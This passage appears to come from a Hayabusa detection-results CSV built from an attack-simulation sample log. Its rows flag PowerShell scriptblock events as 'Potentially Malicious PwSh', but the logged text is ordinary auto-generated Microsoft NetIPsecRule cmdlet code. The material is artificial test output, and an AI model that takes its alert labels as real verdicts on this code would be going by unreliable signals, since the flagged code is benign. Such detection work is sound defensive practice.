${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
